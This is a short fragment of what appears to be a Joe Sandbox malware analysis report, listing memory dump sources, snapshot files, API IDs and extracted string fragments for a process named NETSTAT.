                                                       • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4_w@4_w
                                                      • API String ID: 4062629308-713214301
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581608341.0000000003710000.00000040.00000800.00020000.00000000.sdmp, Offset: 03710000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3710000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -g+&$8/$E:sx$sx;C
                                                      • API String ID: 0-509217568